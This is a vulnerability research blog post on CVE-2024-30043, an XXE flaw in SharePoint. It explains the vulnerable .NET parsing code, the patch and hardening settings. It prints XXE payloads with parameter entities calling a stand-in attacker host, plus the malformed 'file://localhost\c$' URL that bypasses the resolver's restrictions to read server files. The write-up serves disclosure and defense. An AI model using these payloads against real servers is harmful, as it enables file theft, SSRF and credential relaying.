CVE-2024-30043: ABUSING URL PARSING CONFUSION TO EXPLOIT XXE ON SHAREPOINT SERVER AND CLOUD

Original text by Piotr Bazydło

Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.

So why am I writing a blog post about an XXE? I have two reasons:

• It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user.
• This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.

The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:

• Read files with SharePoint Farm Service account permission.
• Perform Server-side request forgery (SSRF) attacks.
• Perform NTLM Relaying.
• Achieve any other side effects to which XXE may lead.

Let us go straight to the details.

BaseXmlDataSource DataSource

Microsoft.SharePoint.WebControls.BaseXmlDataSource is an abstract base class, inheriting from DataSource, for data source objects that can be added to a SharePoint page. A DataSource can be included in a SharePoint page in order to retrieve data (in a way specific to that particular DataSource). When a BaseXmlDataSource is present on a page, its Execute method will be called at some point during page rendering:

protected XmlDocument Execute(string request) // [1]
{
    SPSite spsite = null;
    try
    {
        if (!BaseXmlDataSource.GetAdminSettings(out spsite).DataSourceControlEnabled)
        {
            throw new DataSourceControlDisabledException(SPResource.GetString("DataSourceControlDisabled", new object[0]));
        }
        string text = this.FetchData(request); // [2]
        if (text != null && text.Length > 0)
        {
            XmlReaderSettings xmlReaderSettings = new XmlReaderSettings();
            xmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit; // [3]
            XmlTextReader xmlTextReader = new XmlTextReader(new StringReader(text));
            XmlSecureResolver xmlResolver = new XmlSecureResolver(new XmlUrlResolver(), request); // [4]
            xmlTextReader.XmlResolver = xmlResolver; // [5]
            XmlReader xmlReader = XmlReader.Create(xmlTextReader, xmlReaderSettings); // [6]
            try
            {
                do
                {
                    xmlReader.Read(); // [7]
                }
                while (xmlReader.NodeType != XmlNodeType.Element);
            }
            ...
        }
        ...
    }
    ...
}

At [1], you can see the Execute method, which accepts a string called request. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as DataFile.

At this point, we can divide this method into two main parts: XML fetching and XML parsing.

       a) XML Fetching

At [2], this.FetchData is called and our URL is passed as an input argument. BaseXmlDataSource does not implement this method (it’s an abstract class).

FetchData is implemented in three classes that extend our abstract class:
• SoapDataSource: performs an HTTP SOAP request and retrieves a response (XML).
• XmlUrlDataSource: performs a customizable HTTP request and retrieves a response (XML).
• SPXmlDataSource: retrieves an existing specified file on the SharePoint site.

We will revisit those classes later.

       b) XML Parsing

At [3], the xmlReaderSettings.DtdProcessing member is set to DtdProcessing.Prohibit, which should disable the processing of DTDs.

At [4] and [5], the xmlTextReader.XmlResolver is set to a freshly created XmlSecureResolver. The request string, which we fully control, is passed as the securityUrl parameter when creating the XmlSecureResolver.

At [6], the code creates a new instance of XmlReader.

Finally, it reads the contents of the XML using a do-while loop at [7].

At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our XmlReaderSettings instance is set to Prohibit, which should block all DTD processing. On the other hand, we have the XmlResolver set to XmlSecureResolver.

In my experience, it is very rare to see .NET code where:
• DTDs are blocked through XmlReaderSettings.
• Some XmlResolver is still defined.

I decided to play around and sent a general entity-based payload to some test code I wrote, similar to the code shown above (I only replaced XmlSecureResolver with XmlUrlResolver for testing purposes):

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY b SYSTEM "http://attacker/poc.txt">
]>
<r>&b;</r>

As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://attacker/poc.xml">
%sp;
]>
<a>wat</a>

It was a massive surprise to me, but the HTTP request was performed! Based on that, it seems that when you have .NET code where:
• XmlReader is used with XmlTextReader and XmlReaderSettings.
• XmlReaderSettings.DtdProcessing is set to Prohibit.
• An XmlTextReader.XmlResolver is set.

The resolver will first try to handle the parameter entities, and only afterwards will perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the Out-of-Band XXE and potentially exfiltrate data (using, for example, an HTTP channel).
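The observation above can be checked without touching the network. What follows is only a minimal sketch, not the author's actual test code: RecordingResolver and DtdProbe are hypothetical names introduced here, and the resolver returns a harmless stub instead of fetching anything. It mirrors the pattern in Execute (resolver on the XmlTextReader, DTD prohibition only on the XmlReaderSettings wrapper) and reports whether the resolver was consulted before the exception surfaced. Results may differ between .NET Framework and newer runtimes, so no expected output is claimed.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Net;
using System.Text;
using System.Xml;

// Hypothetical helper: records every URI the parser asks for and returns a
// harmless stub, so nothing is fetched over the network.
sealed class RecordingResolver : XmlResolver
{
    public List<Uri> Requested { get; } = new List<Uri>();

    public override ICredentials Credentials { set { } }

    public override object GetEntity(Uri absoluteUri, string role, Type ofObjectToReturn)
    {
        Requested.Add(absoluteUri);
        return new MemoryStream(Encoding.UTF8.GetBytes("<!-- stub -->"));
    }
}

static class DtdProbe
{
    // Same shape as Execute: the resolver sits on the inner XmlTextReader,
    // while DTDs are prohibited only through XmlReaderSettings.
    public static void Run(string xml, out int resolverCalls, out Exception error)
    {
        var resolver = new RecordingResolver();
        var settings = new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit };
        var inner = new XmlTextReader(new StringReader(xml)) { XmlResolver = resolver };
        error = null;
        try
        {
            using (XmlReader reader = XmlReader.Create(inner, settings))
            {
                // Advance until the first element (or end of input).
                while (reader.Read() && reader.NodeType != XmlNodeType.Element) { }
            }
        }
        catch (XmlException ex)
        {
            error = ex;
        }
        resolverCalls = resolver.Requested.Count;
    }

    static void Main()
    {
        // The parameter-entity payload from the text.
        const string payload =
            "<?xml version=\"1.0\" ?>\n" +
            "<!DOCTYPE a [\n" +
            "<!ELEMENT a ANY >\n" +
            "<!ENTITY % sp SYSTEM \"http://attacker/poc.xml\">\n" +
            "%sp;\n" +
            "]>\n" +
            "<a>wat</a>";

        Run(payload, out int calls, out Exception error);
        Console.WriteLine("resolver consulted: " + calls + " time(s)");
        Console.WriteLine("exception: " + (error == null ? "none" : error.Message));
    }
}
```

If the resolver count is non-zero while an exception is still reported, the parser resolved the parameter entity before enforcing the prohibition, which is the ordering described above.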

The XXE is there, but we have to solve two mysteries:

• How can we properly fetch the XML payload in SharePoint?
• What’s the deal with this XmlSecureResolver?

XML Fetching and XmlSecureResolver

As I have already mentioned, there are 3 classes that extend our vulnerable BaseXmlDataSource. Their FetchData method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.

Let’s summarize those 3 classes:

       a) XmlUrlDataSource

       • Accepts URLs with a protocol set to either http or https.
       • Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use.
       • Some SSRF protections are implemented. This class won’t allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space.

       b) SoapDataSource

       • Almost identical to the first one, although it allows you to perform SOAP requests only (body must contain valid XML, plus additional restrictions).
       • The same SSRF protections exist as in XmlUrlDataSource.

       c) SPXmlDataSource

       • Allows retrieval of the contents of SharePoint pages or documents. If you have a file test.xml uploaded to the sample site, you can provide a URL as follows: /sites/sample/test.xml.

At this point, those HTTP-based classes look like a great match. We can:
• Create an HTTP server.
• Fetch malicious XML from our server.
• Trigger XXE and potentially read files from SharePoint server. 

Let’s test this. I’m creating an XmlUrlDataSource, and I want it to fetch the XML from this URL:

       http://attacker.com/poc.xml

poc.xml contains the following payload:

<?xml version="1.0" ?>
<!DOCTYPE a [
<!ELEMENT a ANY >
<!ENTITY % sp SYSTEM "http://localhost/test">
%sp;
]>

The plan is simple. I want to test the XXE by executing an HTTP request to the localhost (SSRF). 

We must also remember that whatever URL we specify as our source also becomes the securityUrl of the XmlSecureResolver. Accordingly, this is what will be executed:

Figure 1 XmlSecureResolver initialization

Who cares anyway? YOLO and let’s move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:

The action that failed was:
Demand
The type of the first permission that failed was:
System.Net.WebPermission
The first permission that failed was:
<IPermission class="System.Net.WebPermission, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" version="1">
<ConnectAccess>
<URI uri="http://localhost/test"/>
</ConnectAccess>
</IPermission>

Figure 2 Exception thrown during XXE->SSRF

It seems that “Secure” in XmlSecureResolver stands for something. In general, it is a wrapper around various resolvers, which allows you to apply some resource fetching restrictions. Here is a fragment of the Microsoft documentation:

“Helps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to.”

In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Let’s see a simplified example for http://attacker.com/test.xml:

Figure 3 Simplified sample restrictions applied by XmlSecureResolver

In short, it creates restrictions based on protocol, hostname, and a couple of different things (like an optional port, which is not applicable to all protocols). If we fetch our XML from http://attacker.com, we won’t be able to make a request to http://localhost because the host does not match.

The same goes for the protocol. If we fetch XML from the attacker’s HTTP server, we won’t be able to access local files with XXE, because neither the protocol (http:// versus file://) nor the host match as required.
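To make the matching rule concrete, here is a deliberately simplified toy model of the policy behavior described in this post. It is an assumption-laden sketch, not how XmlSecureResolver or Code Access Security is implemented: PolicySketch and MayAccess are hypothetical names, the port is ignored, the backslash is assumed to act as a separator, and the only "unrestricted" case modeled is a file:// URL on localhost, because that is the only one reported here.

```csharp
using System;

static class PolicySketch
{
    // Splits "scheme://host[:port]/rest" by hand. Returns false when the
    // string has no scheme (for example a bare path).
    static bool TrySplit(string url, out string scheme, out string host)
    {
        scheme = null;
        host = null;
        int sep = url.IndexOf("://", StringComparison.Ordinal);
        if (sep <= 0) return false;

        scheme = url.Substring(0, sep).ToLowerInvariant();
        string rest = url.Substring(sep + 3);
        // Assumption: a backslash ends the host just like a forward slash.
        int end = rest.IndexOfAny(new[] { '/', '\\', '?', '#' });
        string authority = end < 0 ? rest : rest.Substring(0, end);
        int colon = authority.LastIndexOf(':');
        host = (colon < 0 ? authority : authority.Substring(0, colon)).ToLowerInvariant();
        return true;
    }

    // Toy rule set: may a document loaded from securityUrl reach target?
    public static bool MayAccess(string securityUrl, string target)
    {
        // No protocol at all: modeled as "deny everything".
        if (!TrySplit(securityUrl, out string srcScheme, out string srcHost)) return false;

        // Looks like a local file: modeled as unrestricted.
        if (srcScheme == "file" && (srcHost == "localhost" || srcHost == "")) return true;

        // Otherwise protocol and host must both match.
        return TrySplit(target, out string dstScheme, out string dstHost)
            && dstScheme == srcScheme
            && dstHost == srcHost;
    }

    static void Main()
    {
        Console.WriteLine(MayAccess("http://attacker.com/poc.xml", "http://localhost/test"));
        Console.WriteLine(MayAccess("http://attacker.com/poc.xml", "file:///c:/windows/win.ini"));
        Console.WriteLine(MayAccess("http://attacker.com/poc.xml", "http://attacker.com/other.xml"));
    }
}
```

In this model only the third call is allowed, which matches the conclusion above: XML fetched from the attacker's HTTP server can only talk back to that same server.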

To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionalities of our SharePoint sources (such as XmlUrlDataSource). We need to figure out something else.

SPXmlDataSource and URL Parsing Issues

At this point, I was not able to abuse the HTTP-based sources. I tried to use SPXmlDataSource with the following request:

       /sites/mysite/test.xml

The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the http://sharepoint/sites/mysite/test.xml document and then we:
       • Create SPXmlDataSource.
       • Set DataFile to /sites/mysite/test.xml.

SPXmlDataSource will successfully retrieve our XML. What about XmlSecureResolver? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.

It made me wonder about the URL parsing. I knew that I could not abuse the HTTP-based XmlUrlDataSource and SoapDataSource. Their code is written in C# and was pretty straightforward to read; the URL parsing looked good there. On the other hand, the URL parsing of SPXmlDataSource is performed by some unmanaged code, which cannot be easily decompiled and read.

I started thinking about the following potential exploitation scenario:
       • Delivering a “malformed” URL.
       • SPXmlDataSource somehow manages to handle this URL, and retrieves my uploaded XML successfully.
       • The URL gives me an unrestricted XmlSecureResolver policy and I’m able to fully exploit XXE.

This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when XmlSecureResolver gives us a nice policy, which allows us to:
       • Access a local file system (to read file contents).
       • Perform HTTP communication to any server (to exfiltrate data).

Let’s deliver the following URL to XmlSecureResolver:

       file://localhost/c$/whatever

Bingo! XmlSecureResolver creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access, and we can do anything we want.

Such a URL is not something that we should be able to deliver to SPXmlDataSource or any other data source that we have available. None of them is based on the local file system, and even if they were, we are not able to upload files there.

Still, we don’t know how SPXmlDataSource is handling URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:

       file://localhost\c$/sites/mysite/test.xml

Let’s see how SPXmlDataSource handles it (based on my observations):

Figure 4 SPXmlDataSource — handling of malformed URL

This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in XmlSecureResolver! This URL parsing confusion between those two components gives us the possibility to fully exploit the XXE and perform a file read.

The entire attack scenario looks like this:

Figure 5 SharePoint XXE — entire exploitation scenario

Demo

Let’s have a look at the demo, to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that:
       • SPXmlDataSource fetches the malicious XML file, even though the URL is malformed.
       • XmlSecureResolver creates an unrestricted access policy.
       • XXE is exploited and we retrieve the win.ini file.
       • “DTD prohibited” exception is eventually thrown, but we were still able to abuse the OOB XXE.

The Patch

The patch from Microsoft implemented two main changes:
       • More URL parsing controls for SPXmlDataSource.
       • XmlTextReader object also prohibits DTD usage (previously, only XmlReaderSettings did that).

In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: XmlReaderSettings versus XmlTextReader). When XmlTextReader prohibits the DTD usage, parameter entities seem to never be resolved, even with the resolver specified (that’s how this patch works). On the other hand, when XmlReaderSettings prohibits DTDs, parameter entities are resolved when the XmlUrlResolver is used. You can easily get confused here.
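For reviewers who meet this pattern in their own code, the second change can be sketched as follows. This is an illustration of the idea only, not Microsoft's actual patch: HardenedXml and its methods are hypothetical names, and clearing the resolver is an extra precaution assumed here rather than something the patch is stated to do.

```csharp
using System;
using System.IO;
using System.Xml;

static class HardenedXml
{
    // Prohibit DTDs on the inner XmlTextReader as well as on the settings,
    // and leave the parser with no resolver to call.
    public static XmlReader Create(string xml)
    {
        var inner = new XmlTextReader(new StringReader(xml))
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null
        };
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit,
            XmlResolver = null
        };
        return XmlReader.Create(inner, settings);
    }

    // Returns true when parsing the document fails with an XmlException.
    public static bool Rejects(string xml)
    {
        try
        {
            using (XmlReader reader = Create(xml))
            {
                while (reader.Read()) { }
            }
            return false;
        }
        catch (XmlException)
        {
            return true;
        }
    }

    static void Main()
    {
        const string withDtd =
            "<!DOCTYPE a [ <!ENTITY % sp SYSTEM \"http://attacker/poc.xml\"> %sp; ]><a>wat</a>";

        Console.WriteLine("plain document rejected: " + Rejects("<a>ok</a>"));
        Console.WriteLine("DOCTYPE document rejected: " + Rejects(withDtd));
    }
}
```

The design point is that the prohibition sits on the object that actually parses the DOCTYPE, so the document is refused before any entity in the internal subset is processed.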

Summary

A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.

I hope you liked this writeup. I have a huge line of upcoming blog posts, but vulnerabilities are waiting for the patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.